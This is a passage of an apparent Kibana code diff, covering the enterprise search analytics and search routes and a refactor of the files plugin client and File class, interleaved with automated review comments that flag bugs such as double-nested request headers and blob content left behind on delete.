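Review bot: The `indexNamesAlreadyIncluded` / `indexNamesToInclude` / `itemsToInclude` pre-filter is redundant with the final `filter`, which already keeps only the first entry per `name`: `regularIndexData` is spread before `itemsToInclude`, so any always-show item whose name is already present would be dropped by that step anyway. It also runs two `Array.prototype.includes` scans per item, i.e. O(n·m) over all indices and aliases in the cluster. `const indicesData = [...regularIndexData, ...alwaysShowIndices];` in place of those statements preserves the result (when `alwaysShowSearchPattern` is unset `alwaysShowIndices` is `[]`) and drops the quadratic pass, and the `as ElasticsearchIndexWithPrivileges[]` cast is unnecessary since both arrays already carry that element type; if an explicit pre-dedup is preferred, build `indexNamesAlreadyIncluded` as a `Set` and test with `.has`. fetchIndices's signature and earlier body are outside this hunk.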
--- a/x-pack/plugins/enterprise_search/server/plugin.ts +++ b/x-pack/plugins/enterprise_search/server/plugin.ts @@ -46,6 +46,7 @@ import { import { registerAppSearchRoutes } from './routes/app_search'; import { registerEnterpriseSearchRoutes } from './routes/enterprise_search'; +import { registerAnalyticsRoutes } from './routes/enterprise_search/analytics'; import { registerConfigDataRoute } from './routes/enterprise_search/config_data'; import { registerConnectorRoutes } from './routes/enterprise_search/connectors'; import { registerCrawlerRoutes } from './routes/enterprise_search/crawler/crawler'; @@ -168,6 +169,7 @@ export class EnterpriseSearchPlugin implements Plugin { // Enterprise Search Routes registerConnectorRoutes(dependencies); registerCrawlerRoutes(dependencies); + registerAnalyticsRoutes(dependencies); getStartServices().then(([, { security: securityStart }]) => { registerCreateAPIKeyRoute(dependencies, securityStart); diff --git a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/analytics.ts b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/analytics.ts new file mode 100644 index 0000000000000..be53b797239a1 --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/analytics.ts 
@@ -0,0 +1,51 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { schema } from '@kbn/config-schema'; + +import { i18n } from '@kbn/i18n'; + +import { ErrorCode } from '../../../common/types/error_codes'; +import { addAnalyticsCollection } from '../../lib/analytics/add_analytics_collection'; +import { RouteDependencies } from '../../plugin'; +import { createError } from '../../utils/create_error'; +import { elasticsearchErrorHandler } from '../../utils/elasticsearch_error_handler'; + +export function registerAnalyticsRoutes({ router, log }: RouteDependencies) { + router.post( + { + path: '/internal/enterprise_search/analytics/collections', + validate: { + body: schema.object({ + name: schema.string(), + }), + }, + }, + elasticsearchErrorHandler(log, async (context, request, response) => { + const { client } = (await context.core).elasticsearch; + try { + const body = await addAnalyticsCollection(client, request.body); + return response.ok({ body }); + } catch (error) { + if ((error as Error).message === ErrorCode.ANALYTICS_COLLECTION_ALREADY_EXISTS) { + return createError({ + errorCode: (error as Error).message as ErrorCode, + message: i18n.translate( + 'xpack.enterpriseSearch.server.routes.addAnalyticsCollection.analyticsCollectionExistsError', + { + defaultMessage: 'Analytics collection already exists', + } + ), + response, + statusCode: 409, + }); + } + throw error; + } + }) + ); +} diff --git a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/indices.ts b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/indices.ts index 25ecd295ceb35..5d5f72c297727 100644 --- a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/indices.ts 
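Review bot: `name: schema.string()` accepts the empty string and unbounded input for what becomes the analytics collection's identifier; `name: schema.string({ minLength: 1 })` (plus a `maxLength` suited to the backing store) rejects degenerate values at the route boundary rather than inside `addAnalyticsCollection`. In the 409 branch, `errorCode: (error as Error).message as ErrorCode` double-casts a value the guard on the previous line has already proven equal to `ErrorCode.ANALYTICS_COLLECTION_ALREADY_EXISTS`; using the enum member directly removes both casts. Comparing `error.message` to an error code also couples the route to the library's message text, so a typed error class or a `code` property would hold up better as the library grows more failure modes.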
+++ b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/indices.ts @@ -27,7 +27,7 @@ export function registerIndexRoutes({ router, log }: RouteDependencies) { { path: '/internal/enterprise_search/search_indices', validate: false }, elasticsearchErrorHandler(log, async (context, _, response) => { const { client } = (await context.core).elasticsearch; - const indices = await fetchIndices(client, '*', false, true); + const indices = await fetchIndices(client, '*', false, true, 'search-'); return response.ok({ body: indices, diff --git a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.test.ts b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.test.ts index ac6d8b70fde07..0004d178f7796 100644 --- a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.test.ts +++ b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.test.ts @@ -27,8 +27,8 @@ describe('Elasticsearch Search', () => { mockRouter = new MockRouter({ context, - method: 'get', - path: '/internal/enterprise_search/indices/{index_name}/search/{query}', + method: 'post', + path: '/internal/enterprise_search/indices/{index_name}/search', }); registerSearchRoute({ @@ -37,14 +37,9 @@ describe('Elasticsearch Search', () => { }); }); - describe('GET /internal/enterprise_search/indices/{index_name}/search/{query}', () => { + describe('POST /internal/enterprise_search/indices/{index_name}/search with query on request body', () => { it('fails validation without index_name', () => { - const request = { params: { query: 'banana' } }; - mockRouter.shouldThrow(request); - }); - - it('fails validation without query', () => { - const request = { params: { index_name: 'search-banana' } }; + const request = { body: { searchQuery: '' }, params: {} }; mockRouter.shouldThrow(request); }); 
@@ -73,7 +68,10 @@ describe('Elasticsearch Search', () => { }); await mockRouter.callRoute({ - params: { index_name: 'search-index-name', query: 'banana' }, + body: { + searchQuery: 'banana', + }, + params: { index_name: 'search-index-name' }, }); expect(fetchSearchResults).toHaveBeenCalledWith( @@ -102,7 +100,7 @@ describe('Elasticsearch Search', () => { }); }); - describe('GET /internal/enterprise_search/indices/{index_name}/search', () => { + describe('POST /internal/enterprise_search/indices/{index_name}/search', () => { let mockRouterNoQuery: MockRouter; beforeEach(() => { const context = { @@ -111,7 +109,7 @@ describe('Elasticsearch Search', () => { mockRouterNoQuery = new MockRouter({ context, - method: 'get', + method: 'post', path: '/internal/enterprise_search/indices/{index_name}/search', }); diff --git a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.ts b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.ts index 7e51d00aa2537..3ea14a2013a59 100644 --- a/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.ts +++ b/x-pack/plugins/enterprise_search/server/routes/enterprise_search/search.ts 
@@ -37,52 +37,17 @@ const calculateMeta = (searchResults: SearchResponseBody, page: number, size: nu }; export function registerSearchRoute({ router, log }: RouteDependencies) { - router.get( + router.post( { path: '/internal/enterprise_search/indices/{index_name}/search', validate: { - params: schema.object({ - index_name: schema.string(), - }), - query: schema.object({ - page: schema.number({ defaultValue: 0, min: 0 }), - size: schema.number({ - defaultValue: ENTERPRISE_SEARCH_DOCUMENTS_DEFAULT_DOC_COUNT, - min: 0, + body: schema.object({ + searchQuery: schema.string({ + defaultValue: '', }), }), - }, - }, - elasticsearchErrorHandler(log, async (context, request, response) => { - const indexName = decodeURIComponent(request.params.index_name); - const { client } = (await context.core).elasticsearch; - const { page = 0, size = ENTERPRISE_SEARCH_DOCUMENTS_DEFAULT_DOC_COUNT } = request.query; - const from = page * size; - const searchResults: SearchResponseBody = await fetchSearchResults( - client, - indexName, - '', - from, - size - ); - - return response.ok({ - body: { - meta: calculateMeta(searchResults, page, size), - results: searchResults, - }, - headers: { 'content-type': 'application/json' }, - }); - }) - ); - - router.get( - { - path: '/internal/enterprise_search/indices/{index_name}/search/{query}', - validate: { params: schema.object({ index_name: schema.string(), - query: schema.string(), }), query: schema.object({ page: schema.number({ defaultValue: 0, min: 0 }), 
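Review bot: `searchQuery: schema.string({ defaultValue: '' })` places no bound on the text that is forwarded to Elasticsearch as the `q` query_string now that it arrives in a POST body instead of a URL segment; `searchQuery: schema.string({ defaultValue: '', maxLength: <max query length> })` keeps the request-body limit from being the only cap. The route is a read registered with `router.post`, which is justified by carrying the query in the body, so a comment such as `// POST so the search text travels in the body rather than the path` would stop a later reader reverting it to GET. The handler body is in the next hunk and the surrounding `query` schema continues past this one.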
@@ -95,14 +60,14 @@ export function registerSearchRoute({ router, log }: RouteDependencies) { }, elasticsearchErrorHandler(log, async (context, request, response) => { const indexName = decodeURIComponent(request.params.index_name); + const searchQuery = request.body.searchQuery; const { client } = (await context.core).elasticsearch; const { page = 0, size = ENTERPRISE_SEARCH_DOCUMENTS_DEFAULT_DOC_COUNT } = request.query; const from = page * size; - - const searchResults = await fetchSearchResults( + const searchResults: SearchResponseBody = await fetchSearchResults( client, indexName, - request.params.query, + searchQuery, from, size ); diff --git a/x-pack/plugins/event_log/scripts/create_schemas.js b/x-pack/plugins/event_log/scripts/create_schemas.js index 1a775b44add8d..dc4eeb01c8957 100755 --- a/x-pack/plugins/event_log/scripts/create_schemas.js +++ b/x-pack/plugins/event_log/scripts/create_schemas.js @@ -9,7 +9,7 @@ const fs = require('fs'); const path = require('path'); -const { set } = require('@elastic/safer-lodash-set'); +const { set } = require('@kbn/safer-lodash-set'); const lodash = require('lodash'); const LineWriter = require('./lib/line_writer'); diff --git a/x-pack/plugins/files/common/types.ts b/x-pack/plugins/files/common/types.ts index 2fef7ab3f17c4..d3c8795fc7321 100644 --- a/x-pack/plugins/files/common/types.ts +++ b/x-pack/plugins/files/common/types.ts @@ -332,7 +332,16 @@ export interface FileUnshareOptions { * A class with set of properties and behaviors of the "smart" file object and adds * behaviours for interacting with files on top of the pure data. */ -export interface File extends FileJSON { +export interface File { + /** + * The file ID + */ + id: string; + + /** + * File metadata in camelCase form. + */ + data: FileJSON; /** * Update a file object's metadatathat can be updated. * 
@@ -345,7 +354,7 @@ export interface File extends FileJSON { * * @param content - The content to stream to storage. */ - uploadContent(content: Readable): Promise; + uploadContent(content: Readable): Promise>; /** * Stream file content from storage. diff --git a/x-pack/plugins/files/public/files_client/files_client.test.ts b/x-pack/plugins/files/public/files_client/files_client.test.ts new file mode 100644 index 0000000000000..7b5ead0c03d0a --- /dev/null +++ b/x-pack/plugins/files/public/files_client/files_client.test.ts 
@@ -0,0 +1,56 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { apiRoutes } from './files_client'; + +describe('apiRoutes', () => { + test('generates expected paths', () => { + expect(apiRoutes.getCreateFileRoute('test')).toMatchInlineSnapshot(`"/api/files/files/test"`); + + expect(apiRoutes.getUploadRoute('test', '123')).toMatchInlineSnapshot( + `"/api/files/files/test/123/blob"` + ); + + expect(apiRoutes.getDownloadRoute('test', '123', 'my-file.png')).toMatchInlineSnapshot( + `"/api/files/files/test/123/blob/my-file.png"` + ); + + expect(apiRoutes.getUpdateRoute('test', '123')).toMatchInlineSnapshot( + `"/api/files/files/test/123"` + ); + + expect(apiRoutes.getDeleteRoute('test', '123')).toMatchInlineSnapshot( + `"/api/files/files/test/123"` + ); + + expect(apiRoutes.getListRoute('test', 1, 1)).toMatchInlineSnapshot( + `"/api/files/files/test/list?page=1&perPage=1"` + ); + + expect(apiRoutes.getByIdRoute('test', '123')).toMatchInlineSnapshot( + `"/api/files/files/test/123"` + ); + + expect(apiRoutes.getShareRoute('test', '123')).toMatchInlineSnapshot( + `"/api/files/shares/test/123"` + ); + + expect(apiRoutes.getListSharesRoute('test', 1, 1)).toMatchInlineSnapshot( + `"/api/files/shares/test?page=1&perPage=1"` + ); + + expect(apiRoutes.getPublicDownloadRoute('test', 'my-file.pdf')).toMatchInlineSnapshot( + `"/api/files/public/blob/my-file.pdf?token=test"` + ); + + expect(apiRoutes.getFindRoute(1, 1)).toMatchInlineSnapshot( + `"/api/files/find?page=1&perPage=1"` + ); + + expect(apiRoutes.getMetricsRoute()).toMatchInlineSnapshot(`"/api/files/metrics"`); + }); +}); diff --git a/x-pack/plugins/files/public/files_client/files_client.ts b/x-pack/plugins/files/public/files_client/files_client.ts index ffa8e815368f0..3abd6c935541c 100644 
--- a/x-pack/plugins/files/public/files_client/files_client.ts +++ b/x-pack/plugins/files/public/files_client/files_client.ts 
@@ -5,23 +5,64 @@ * 2.0. */ +import { pipe } from 'fp-ts/lib/function'; import * as qs from 'query-string'; import type { HttpStart } from '@kbn/core/public'; import type { FilesClient } from '../types'; -import { FILES_API_BASE_PATH } from '../../common/api_routes'; +import { + API_BASE_PATH, + FILES_API_BASE_PATH, + FILES_PUBLIC_API_BASE_PATH, + FILES_SHARE_API_BASE_PATH, +} from '../../common/api_routes'; -const apiRoutes = { +const addQueryParams = + (queryParams: object) => + (path: string): string => { + const stringified = qs.stringify(queryParams); + return `${path}${stringified ? `?${stringified}` : ''}`; + }; + +/** + * @internal + */ +export const apiRoutes = { + /** + * Scoped to file kind + */ getCreateFileRoute: (fileKind: string) => `${FILES_API_BASE_PATH}/${fileKind}`, getUploadRoute: (fileKind: string, id: string) => `${FILES_API_BASE_PATH}/${fileKind}/${id}/blob`, getDownloadRoute: (fileKind: string, id: string, fileName?: string) => - `${FILES_API_BASE_PATH}/${fileKind}/${id}/blob/${fileName ? fileName : ''}`, + `${FILES_API_BASE_PATH}/${fileKind}/${id}/blob${fileName ? '/' + fileName : ''}`, getUpdateRoute: (fileKind: string, id: string) => `${FILES_API_BASE_PATH}/${fileKind}/${id}`, getDeleteRoute: (fileKind: string, id: string) => `${FILES_API_BASE_PATH}/${fileKind}/${id}`, getListRoute: (fileKind: string, page?: number, perPage?: number) => { - const qParams = qs.stringify({ page, perPage }); - return `${FILES_API_BASE_PATH}/${fileKind}/list${qParams ? 
`?${qParams}` : ''}`; + return pipe(`${FILES_API_BASE_PATH}/${fileKind}/list`, addQueryParams({ page, perPage })); }, getByIdRoute: (fileKind: string, id: string) => `${FILES_API_BASE_PATH}/${fileKind}/${id}`, + + /** + * Scope to file shares and file kind + */ + getShareRoute: (fileKind: string, id: string) => `${FILES_SHARE_API_BASE_PATH}/${fileKind}/${id}`, + getListSharesRoute: (fileKind: string, page?: number, perPage?: number, forFileId?: string) => + pipe(`${FILES_SHARE_API_BASE_PATH}/${fileKind}`, addQueryParams({ page, perPage, forFileId })), + + /** + * Public routes + */ + getPublicDownloadRoute: (token: string, fileName?: string) => + pipe( + `${FILES_PUBLIC_API_BASE_PATH}/blob${fileName ? '/' + fileName : ''}`, + addQueryParams({ token }) + ), + + /** + * Top-level routes + */ + getFindRoute: (page?: number, perPage?: number) => + pipe(`${API_BASE_PATH}/find`, addQueryParams({ page, perPage })), + getMetricsRoute: () => `${API_BASE_PATH}/metrics`, }; interface Args { 
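Review bot: The route builders interpolate `fileKind`, `id` and `fileName` into the path without encoding while only the query parameters go through `qs.stringify` in `addQueryParams`; a `fileName` containing `/`, `?` or `#` therefore changes which path the request is sent to instead of being treated as a name, and `getPublicDownloadRoute` takes an arbitrary `fileName` too. `${FILES_API_BASE_PATH}/${fileKind}/${id}/blob${fileName ? '/' + encodeURIComponent(fileName) : ''}` in `getDownloadRoute`, and the same in `getPublicDownloadRoute`, covers the two places where a user-chosen value enters the path; `id` and `fileKind` are presumably server-generated or static, but encoding every segment is simpler to reason about. The `fp-ts` `pipe` import only expresses what `addQueryParams({ page, perPage })(path)` already says. The hunk's trailing `interface Args` continues outside it.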
@@ -29,40 +70,72 @@ interface Args { http: HttpStart; } +const commonBodyHeaders = { + headers: { + 'content-type': 'application/json', + }, +}; + export const createFilesClient = ({ http, fileKind }: Args): FilesClient => { return { - create(args) { + create: (args) => { return http.post(apiRoutes.getCreateFileRoute(fileKind), { - headers: { - 'content-type': 'application/json', - }, + headers: commonBodyHeaders, body: JSON.stringify(args), }); }, - delete(args) { + delete: (args) => { return http.delete(apiRoutes.getDeleteRoute(fileKind, args.id)); }, - download(args) { + download: (args) => { return http.get(apiRoutes.getDownloadRoute(fileKind, args.id, args.fileName)); }, - getById(args) { + getById: (args) => { return http.get(apiRoutes.getByIdRoute(fileKind, args.id)); }, - list(args) { - return http.get(apiRoutes.getListRoute(fileKind, args.page, args.perPage)); + list: ({ page, perPage }) => { + return http.get(apiRoutes.getListRoute(fileKind, page, perPage)); }, - update({ id, ...body }) { + update: ({ id, ...body }) => { return http.patch(apiRoutes.getUpdateRoute(fileKind, id), { - headers: { - 'content-type': 'application/json', - }, + headers: commonBodyHeaders, body: JSON.stringify(body), }); }, - upload(args) { + upload: (args) => { return http.put(apiRoutes.getUploadRoute(fileKind, args.id), { + headers: { + 'content-type': 'application/octet-stream', + }, body: args.body, }); }, + share: ({ fileId, name, validUntil }) => { + return http.post(apiRoutes.getShareRoute(fileKind, fileId), { + headers: commonBodyHeaders, + body: JSON.stringify({ name, validUntil }), + }); + }, + unshare: ({ id }) => { + return http.delete(apiRoutes.getShareRoute(fileKind, id)); + }, + getShare: ({ id }) => { + return http.get(apiRoutes.getShareRoute(fileKind, id)); + }, + listShares: ({ forFileId, page, perPage }) => { + return http.get(apiRoutes.getListSharesRoute(fileKind, page, perPage, forFileId)); + }, + find: ({ page, perPage, ...filterArgs }) => { + return 
http.post(apiRoutes.getFindRoute(page, perPage), { + headers: commonBodyHeaders, + body: JSON.stringify(filterArgs), + }); + }, + getMetrics: () => { + return http.get(apiRoutes.getMetricsRoute()); + }, + publicDownload: ({ token, fileName }) => { + return http.get(apiRoutes.getPublicDownloadRoute(token, fileName)); + }, }; }; diff --git a/x-pack/plugins/files/public/types.ts b/x-pack/plugins/files/public/types.ts index a260e1e08a067..24a3125213020 100644 --- a/x-pack/plugins/files/public/types.ts +++ b/x-pack/plugins/files/public/types.ts @@ -6,14 +6,21 @@ */ import type { - HttpApiInterfaceEntryDefinition, - CreateFileKindHttpEndpoint, - DeleteFileKindHttpEndpoint, - DownloadFileKindHttpEndpoint, - GetByIdFileKindHttpEndpoint, + FindFilesHttpEndpoint, + FileShareHttpEndpoint, + FileUnshareHttpEndpoint, + FileGetShareHttpEndpoint, + FilesMetricsHttpEndpoint, ListFileKindHttpEndpoint, + CreateFileKindHttpEndpoint, + FileListSharesHttpEndpoint, UpdateFileKindHttpEndpoint, UploadFileKindHttpEndpoint, + DeleteFileKindHttpEndpoint, + GetByIdFileKindHttpEndpoint, + DownloadFileKindHttpEndpoint, + FilePublicDownloadHttpEndpoint, + HttpApiInterfaceEntryDefinition, } from '../common/api_routes'; /** @@ -51,6 +58,12 @@ export interface FilesClient { * @param args - list files args */ list: ClientMethodFrom; + /** + * Find a set of files given some filters. + * + * @param args - File filters + */ + find: ClientMethodFrom; /** * Update a set of of metadata values of the file object. * 
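Review bot: `commonBodyHeaders` is defined as `{ headers: { 'content-type': 'application/json' } }` and then passed as `headers: commonBodyHeaders` in `create`, `update`, `share` and `find`, so the fetch options become `{ headers: { headers: { 'content-type': ... } } }` and the JSON content-type the removed inline objects used to set is no longer sent as a header. Either define `const commonBodyHeaders = { 'content-type': 'application/json' };` and keep `headers: commonBodyHeaders`, or keep the constant as is and spread it (`...commonBodyHeaders,`) in place of the `headers:` key. It presumably compiles because the headers option is typed as an open string-keyed record, which is why the checker did not object; the new files_client.test.ts covers the routes but not the request options, so a test asserting the `content-type` sent by `create` would pin it. createFilesClient's `Args` interface starts outside the hunk.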
@@ -69,6 +82,47 @@ export interface FilesClient { * @param args - download file args */ download: ClientMethodFrom; + /** + * Share a file by creating a new file share instance. + * + * @note This returns the secret token that can be used + * to access a file via the public download enpoint. + * + * @param args - File share arguments + */ + share: ClientMethodFrom; + /** + * Delete a file share instance. + * + * @param args - File unshare arguments + */ + unshare: ClientMethodFrom; + /** + * Get a file share instance. + * + * @param args - Get file share arguments + */ + getShare: ClientMethodFrom; + /** + * List all file shares. Optionally scoping to a specific + * file. + * + * @param args - Get file share arguments + */ + listShares: ClientMethodFrom; + /** + * Get metrics of file system, like storage usage. + * + * @param args - Get metrics arguments + */ + getMetrics: ClientMethodFrom; + /** + * Download a file, bypassing regular security by way of a + * secret share token. + * + * @param args - Get public download arguments. + */ + publicDownload: ClientMethodFrom; } /** diff --git a/x-pack/plugins/files/server/file/file.test.ts b/x-pack/plugins/files/server/file/file.test.ts index ebb1efe32422c..1b86af89ba61c 100644 --- a/x-pack/plugins/files/server/file/file.test.ts +++ b/x-pack/plugins/files/server/file/file.test.ts @@ -82,4 +82,14 @@ describe('File', () => { await setImmediate(); expect(blobStoreSpy.calledOnce).toBe(true); }); + + it('updates file data after upload', async () => { + const fileSO = { attributes: { Status: 'AWAITING_UPLOAD' } }; + (soClient.create as jest.Mock).mockResolvedValue(fileSO); + (soClient.update as jest.Mock).mockResolvedValue(fileSO); + + const file = await fileService.createFile({ name: 'test', fileKind }); + await file.uploadContent(Readable.from(['test'])); + expect(file.data.status).toBe('READY'); + }); }); 
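Review bot: In the `share` doc comment `public download enpoint` should read `public download endpoint`, and the `@param` line on `listShares` (`Get file share arguments`) is copied from `getShare`; `@param args - List file shares arguments, optionally scoped to one file via forFileId` describes that method. The `@note` on `share` is the important line here: the returned token is what `publicDownload` accepts in place of regular authorization and, per `getPublicDownloadRoute`, travels as a query parameter, so the doc should say the token is to be handled as a credential (not logged, not persisted in URLs). The `FilesClient` interface starts and ends outside the hunk.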
diff --git a/x-pack/plugins/files/server/file/file.ts b/x-pack/plugins/files/server/file/file.ts index 00544a7e14f08..bdf85af1bec0e 100644 --- a/x-pack/plugins/files/server/file/file.ts +++ b/x-pack/plugins/files/server/file/file.ts @@ -6,27 +6,11 @@ */ import { Logger } from '@kbn/core/server'; -import mimeType from 'mime'; import { Readable } from 'stream'; -import type { FileCompression, FileShareJSON, FileShareJSONWithToken } from '../../common/types'; -import type { - File as IFile, - FileKind, - FileMetadata, - FileStatus, - UpdatableFileMetadata, - FileJSON, -} from '../../common'; -import { - fileAttributesReducer, - Action, - createDefaultFileAttributes, -} from './file_attributes_reducer'; -import { createAuditEvent } from '../audit_events'; -import { InternalFileService } from '../file_service/internal_file_service'; -import { InternalFileShareService } from '../file_share_service'; +import type { FileShareJSON, FileShareJSONWithToken } from '../../common/types'; +import type { File as IFile, UpdatableFileMetadata, FileJSON } from '../../common'; +import { fileAttributesReducer, Action } from './file_attributes_reducer'; import type { FileClientImpl } from '../file_client/file_client'; -import { toJSON } from './to_json'; import { AlreadyDeletedError, ContentAlreadyUploadedError, 
@@ -35,46 +19,37 @@ import { } from './errors'; /** - * Public class that provides all data and functionality consumers will need at the - * individual file level + * Scopes file actions to an ID and set of attributes. * - * @note Instantiation should not happen outside of this plugin + * Also exposes the upload and download functionality. */ export class File implements IFile { - private readonly logAuditEvent: InternalFileService['writeAuditLog']; - constructor( public readonly id: string, - private fileMetadata: FileMetadata, + private metadata: FileJSON, private readonly fileClient: FileClientImpl, - private readonly internalFileService: InternalFileService, - private readonly fileShareService: InternalFileShareService, private readonly logger: Logger - ) { - this.logAuditEvent = this.internalFileService.writeAuditLog.bind(this.internalFileService); - } + ) {} - private async updateFileState(action: Action) { - const { metadata } = await this.fileClient.update({ - id: this.id, - metadata: fileAttributesReducer(this.metadata, action), - }); - this.fileMetadata = metadata; + private async updateFileState(action: Action): Promise { + const metadata = fileAttributesReducer(this.data, action); + await this.fileClient.internalUpdate(this.id, metadata); + this.data = metadata as FileJSON; } private isReady(): boolean { - return this.status === 'READY'; + return this.data.status === 'READY'; } private isDeleted(): boolean { - return this.status === 'DELETED'; + return this.data.status === 'DELETED'; } private uploadInProgress(): boolean { - return this.status === 'UPLOADING'; + return this.data.status === 'UPLOADING'; } - public async update(attrs: Partial): Promise { + public async update(attrs: Partial): Promise> { await this.updateFileState({ action: 'updateFile', payload: attrs, 
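Review bot: `this.data = metadata as FileJSON;` in `updateFileState` casts the reducer's result instead of taking the stored metadata back, where the removed code used the `metadata` returned by `fileClient.update`; if `fileAttributesReducer` returns a wider type the cast hides the mismatch, and if `internalUpdate` normalises anything the in-memory copy now diverges from the persisted document. Typing the reducer to return `FileJSON`, or having `internalUpdate` return the stored metadata and assigning that, removes the cast. The new class doc drops the old `@note Instantiation should not happen outside of this plugin`; if that still holds, keep the line. The `update` method continues outside the hunk.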
@@ -82,14 +57,14 @@ export class File implements IFile { return this; } - public async uploadContent(content: Readable): Promise { + public async uploadContent(content: Readable): Promise> { if (this.uploadInProgress()) { throw new UploadInProgressError('Upload already in progress.'); } if (this.isReady()) { throw new ContentAlreadyUploadedError('Already uploaded file content.'); } - this.logger.debug(`Uploading file [id = ${this.id}][name = ${this.name}].`); + this.logger.debug(`Uploading file [id = ${this.id}][name = ${this.data.name}].`); await this.updateFileState({ action: 'uploading', }); @@ -100,6 +75,7 @@ export class File implements IFile { action: 'uploaded', payload: { size }, }); + return this; } catch (e) { await this.updateFileState({ action: 'uploadError' }); this.fileClient.deleteContent(this.id).catch(() => {}); // Best effort to remove any uploaded content @@ -108,7 +84,7 @@ export class File implements IFile { } public downloadContent(): Promise { - const { size } = this.metadata; + const { size } = this.data; if (!this.isReady()) { throw new NoDownloadAvailableError('This file content is not available for download.'); } 
@@ -126,142 +102,38 @@ export class File implements IFile { await this.updateFileState({ action: 'delete', }); - // Stop sharing this file - await this.fileShareService.deleteForFile({ file: this }); await this.fileClient.delete({ id: this.id, hasContent: this.isReady() }); - this.logAuditEvent( - createAuditEvent({ - action: 'delete', - outcome: 'success', - message: `Deleted file "${this.name}" of kind "${this.fileKind}" with id "${this.id}"`, - }) - ); } public async share({ name, validUntil, }: { - name?: string; + name: string; validUntil?: number; }): Promise { - const shareObject = await this.fileShareService.share({ file: this, name, validUntil }); - this.internalFileService.writeAuditLog( - createAuditEvent({ - action: 'create', - message: `Shared file "${this.name}" with id "${this.id}"`, - }) - ); - return shareObject; + return this.fileClient.share({ name, validUntil, file: this }); } async listShares(): Promise { - const { shares } = await this.fileShareService.list({ fileId: this.id }); + const { shares } = await this.fileClient.listShares({ + fileId: this.id, + }); return shares; } async unshare(opts: { shareId: string }): Promise { - await this.fileShareService.delete({ id: opts.shareId }); - this.internalFileService.writeAuditLog( - createAuditEvent({ - action: 'delete', - message: `Removed share for "${this.name}" with id "${this.id}"`, - }) - ); + await this.fileClient.unshare({ id: opts.shareId }); } public toJSON(): FileJSON { - return toJSON(this.id, this.metadata); - } - - private get metadata(): FileMetadata { - return this.fileMetadata; - } - - public get created(): string { - return this.metadata.created; - } - - public get updated(): string { - return this.metadata.Updated; - } - - public get chunkSize(): number | undefined { - return this.metadata.ChunkSize; - } - - public get fileKind(): string { - return this.fileClient.fileKind; - } - - public get name(): string { - return this.metadata.name; + return this.data; } - public get 
status(): FileStatus { - return this.metadata.Status; + public get data(): FileJSON { + return this.metadata; } - - public get compression(): undefined | FileCompression { - return this.metadata.Compression; - } - - public get size(): undefined | number { - return this.metadata.size; - } - - public get meta(): M { - return this.metadata.Meta as M; - } - - public get alt(): undefined | string { - return this.metadata.Alt; - } - - public get mimeType(): undefined | string { - return this.metadata.mime_type; - } - - public get extension(): undefined | string { - return this.metadata.extension; - } - - /** - * Static method for creating files so that we can keep all of the audit logging for files - * in the same place. - */ - public static async create( - { - name, - fileKind, - alt, - meta, - mime, - }: { name: string; fileKind: FileKind; alt?: string; meta?: unknown; mime?: string }, - internalFileService: InternalFileService, - fileClient: FileClientImpl - ) { - const fileMeta = await fileClient.create({ - metadata: { - ...createDefaultFileAttributes(), - name, - mime_type: mime, - Alt: alt, - Meta: meta, - FileKind: fileKind.id, - extension: (mime && mimeType.getExtension(mime)) ?? undefined, - }, - }); - - const file = internalFileService.toFile(fileMeta.id, fileMeta.metadata, fileKind, fileClient); - - internalFileService.writeAuditLog( - createAuditEvent({ - action: 'create', - message: `Created file "${file.name}" of kind "${file.fileKind}" and id "${file.id}"`, - }) - ); - - return file; + private set data(v: FileJSON) { + this.metadata = v; } } diff --git a/x-pack/plugins/files/server/file/file_attributes_reducer.ts b/x-pack/plugins/files/server/file/file_attributes_reducer.ts index 93bf2f74545d9..fdb2768408af5 100644 --- a/x-pack/plugins/files/server/file/file_attributes_reducer.ts +++ b/x-pack/plugins/files/server/file/file_attributes_reducer.ts 
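Review bot: In `delete`, `hasContent: this.isReady()` is evaluated after `updateFileState({ action: 'delete' })` has already set `data.status` to `'DELETED'`, so unless something before the hunk captures readiness, `isReady()` is always false at that point and the blob content of a READY file is never removed from blob storage — the metadata says deleted while the bytes stay in the index. Capture it first: `const hasContent = this.isReady();` before the state update, then `await this.fileClient.delete({ id: this.id, hasContent });`. `delete`'s signature is outside the hunk. Separately, `toJSON()` now returns `this.data` itself rather than a fresh object, so a caller mutating the returned value mutates the file's internal state; return `{ ...this.data }` or type the `data` getter as `Readonly<FileJSON>`.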
@@ -4,8 +4,7 @@ * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ -import moment from 'moment'; -import { FileMetadata, UpdatableFileMetadata } from '../../common'; +import { FileJSON, UpdatableFileMetadata } from '../../common'; export type Action = | { @@ -20,51 +19,32 @@ export type Action = | { action: 'uploadError'; payload?: undefined } | { action: 'updateFile'; payload: Partial }; -export function createDefaultFileAttributes(): Pick< - FileMetadata, - 'created' | 'Updated' | 'Status' -> { - const dateString = new Date().toISOString(); - return { - created: dateString, - Status: 'AWAITING_UPLOAD', - Updated: dateString, - }; -} - -export function fileAttributesReducer( - state: FileMetadata, - { action, payload }: Action -): FileMetadata { +export function fileAttributesReducer(state: FileJSON, { action, payload }: Action): FileJSON { switch (action) { case 'delete': - return { ...state, Status: 'DELETED' }; + return { ...state, status: 'DELETED' }; case 'uploading': return { ...state, - Status: 'UPLOADING', - Updated: moment().toISOString(), + status: 'UPLOADING', }; case 'uploaded': return { ...state, ...payload, - Status: 'READY', - Updated: moment().toISOString(), + status: 'READY', }; case 'uploadError': return { ...state, - Status: 'UPLOAD_ERROR', - Updated: moment().toISOString(), + status: 